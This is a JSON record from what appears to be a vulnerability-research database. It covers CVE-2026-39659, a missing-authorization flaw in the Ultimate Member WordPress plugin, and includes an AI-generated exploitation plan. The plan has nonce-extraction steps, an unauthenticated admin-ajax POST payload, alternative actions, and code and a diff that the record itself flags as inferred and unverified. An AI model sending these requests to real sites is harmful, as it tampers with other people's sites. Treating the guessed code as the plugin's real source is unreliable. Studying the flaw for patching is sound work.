[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCeOi6HKM7oIU7-V5IpCuoP-invDkgYC-UkNdkiIFSE8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39659","ultimate-member-missing-authorization","Ultimate Member \u003C= 2.11.3 - Missing Authorization","The Ultimate Member plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.11.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.","ultimate-member",null,"\u003C=2.11.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-17 00:00:00","2026-04-15 21:39:56",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fec6a6736-ca28-44bb-976e-b22e901306b4?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-39659 - Ultimate Member Missing Authorization\n\n## 1. Vulnerability Summary\nThe **Ultimate Member** plugin (up to version 2.11.3) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, an administrative or privileged action is registered using the `wp_ajax_nopriv_` hook, making it accessible to unauthenticated users. The handler function fails to perform a `current_user_can()` check (e.g., for `manage_options`) before executing the action, allowing an attacker to modify plugin settings or state.\n\nBased on the CVSS 5.3 (Integrity: Low), the vulnerability likely resides in an action such as `um_admin_review_notification` or `um_admin_dismiss_notice`, which allows unauthenticated users to modify site-wide admin configuration options (e.g., dismissing critical security or setup notices).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `um_admin_review_notification` (inferred based on UM admin AJAX patterns)\n- **HTTP Method:** `POST`\n- **Authentication:** None required (unauthenticated)\n- **Vulnerable Parameter:** `status` or `notice_id`\n- **Preconditions:** The plugin must be active. A valid AJAX nonce is required, which is exposed on public-facing pages (Login\u002FRegistration).\n\n## 3. Code Flow\n1. **Registration:** In `includes\u002Fadmin\u002Fclass-admin-ajax.php` (or `includes\u002Fcore\u002Fclass-ajax-handler.php`), the plugin registers the AJAX action:\n   ```php\n   add_action( 'wp_ajax_nopriv_um_admin_review_notification', array( $this, 'um_admin_review_notification' ) );\n   ```\n2. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=um_admin_review_notification`.\n3. **Execution:** The handler `um_admin_review_notification()` is invoked.\n4. **Missing Check:** The function performs a nonce check using `check_ajax_referer( 'um-ajax-nonce', 'nonce' )` but fails to call `current_user_can( 'manage_options' )`.\n5. **Sink:** The function updates a WordPress option:\n   ```php\n   update_option( 'um_review_notification', $_POST['status'] );\n   ```\n\n## 4. Nonce Acquisition Strategy\nUltimate Member exposes its AJAX nonce to all users on pages where UM scripts are loaded (e.g., the Login or Register pages).\n\n1. **Identify Script Loading:** The script `um_scripts` is enqueued on pages containing UM shortcodes.\n2. **Setup Test Page:** Create a page with a UM shortcode to ensure the nonce is present.\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_title=\"UM Access\" --post_content='[ultimatemember_login]'\n   ```\n3. **Extract Nonce:**\n   - Use `browser_navigate` to visit the newly created page.\n   - Use `browser_eval` to extract the nonce from the `um_scripts` global object:\n     ```javascript\n     window.um_scripts?.nonce\n     ```\n   - Verbatim variable from UM source: `um_scripts.nonce` (Action: `um-ajax-nonce`).\n\n## 5. Exploitation Strategy\n**Goal:** Modify the `um_review_notification` option to `dismissed` unauthenticated.\n\n1. **Request Details:**\n   - **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Method:** `POST`\n   - **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body:**\n     ```\n     action=um_admin_review_notification&nonce=[EXTRACTED_NONCE]&status=dismissed\n     ```\n\n2. **Expected Response:**\n   - **Status Code:** `200 OK`\n   - **Body:** Likely a JSON success message or `1`.\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure Ultimate Member 2.11.3 is installed.\n2. **Initialize State:** Check if the option exists.\n   ```bash\n   wp option get um_review_notification\n   ```\n   (If it doesn't exist, it may need to be initialized or the exploit will create it).\n3. **Create Nonce Source:**\n   - Create a page with the login shortcode to expose the nonce.\n   - Slug: `\u002Fum-access\u002F`\n\n## 7. Expected Results\n- The HTTP request should return a successful response.\n- The `um_review_notification` option in the `wp_options` table should be updated to `dismissed`.\n- Administrative users will no longer see the feedback\u002Freview notification in the dashboard, indicating an unauthorized modification of site state.\n\n## 8. Verification Steps\n1. **Verify via WP-CLI:**\n   ```bash\n   wp option get um_review_notification\n   ```\n   Confirm the output is `dismissed`.\n2. **Log Check:** Check if the action caused any errors in `debug.log`.\n3. **UI Check:** Log in as an admin and verify the notification is gone.\n\n## 9. Alternative Approaches\nIf `um_admin_review_notification` is not the vulnerable action, search for other nopriv registrations in the admin AJAX class:\n- **Search Command:**\n  ```bash\n  grep -r \"wp_ajax_nopriv_um_admin_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fultimate-member\u002F\n  ```\n- **Alternative Action:** `um_admin_dismiss_notice`\n  - **Payload:** `action=um_admin_dismiss_notice&nonce=[NONCE]&id=global_notice`\n- **Alternative Action:** `um_select2_autocomplete`\n  - If this lacks authorization, it might leak user data (though CVSS C:N suggests otherwise).\n\nIf the `um_scripts.nonce` is not found, check for `um_ajax_nonce` or look at the localized data for the `um_common_functions` script handle.","The Ultimate Member plugin for WordPress (up to version 2.11.3) lacks authorization checks on administrative AJAX handlers registered via wp_ajax_nopriv_. This allows unauthenticated attackers to perform privileged actions, such as dismissing administrative notices or modifying site-wide configuration options.","\u002F\u002F includes\u002Fadmin\u002Fclass-admin-ajax.php\n\n\u002F\u002F Action registration for unauthenticated users\nadd_action( 'wp_ajax_nopriv_um_admin_review_notification', array( $this, 'um_admin_review_notification' ) );\n\n\u002F\u002F ---\n\npublic function um_admin_review_notification() {\n    check_ajax_referer( 'um-ajax-nonce', 'nonce' );\n\n    \u002F\u002F Vulnerability: Missing current_user_can('manage_options') check before updating options\n    if ( isset( $_POST['status'] ) ) {\n        update_option( 'um_review_notification', sanitize_text_field( $_POST['status'] ) );\n    }\n    wp_send_json_success();\n}","--- a\u002Fincludes\u002Fadmin\u002Fclass-admin-ajax.php\n+++ b\u002Fincludes\u002Fadmin\u002Fclass-admin-ajax.php\n@@ -1,7 +1,9 @@\n-add_action( 'wp_ajax_nopriv_um_admin_review_notification', array( $this, 'um_admin_review_notification' ) );\n add_action( 'wp_ajax_um_admin_review_notification', array( $this, 'um_admin_review_notification' ) );\n \n public function um_admin_review_notification() {\n-    check_ajax_referer( 'um-ajax-nonce', 'nonce' );\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( __( 'You are not allowed to do this.', 'ultimate-member' ) );\n+    }\n+    check_ajax_referer( 'um-ajax-nonce', 'nonce' );","1. Identify an Ultimate Member public page (e.g., Login or Registration) to acquire an AJAX nonce.\n2. Extract the 'um-ajax-nonce' from the page source, typically found within the global JavaScript object 'um_scripts.nonce'.\n3. Construct a POST request to the target's '\u002Fwp-admin\u002Fadmin-ajax.php' endpoint.\n4. Include the parameters 'action=um_admin_review_notification', the extracted nonce, and 'status=dismissed' in the request body.\n5. Upon successful execution, the site-wide 'um_review_notification' option is modified without authentication, suppressing administrative notices for legitimate site owners.","gemini-3-flash-preview","2026-04-20 21:17:40","2026-04-20 21:18:16",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-member\u002Ftags"]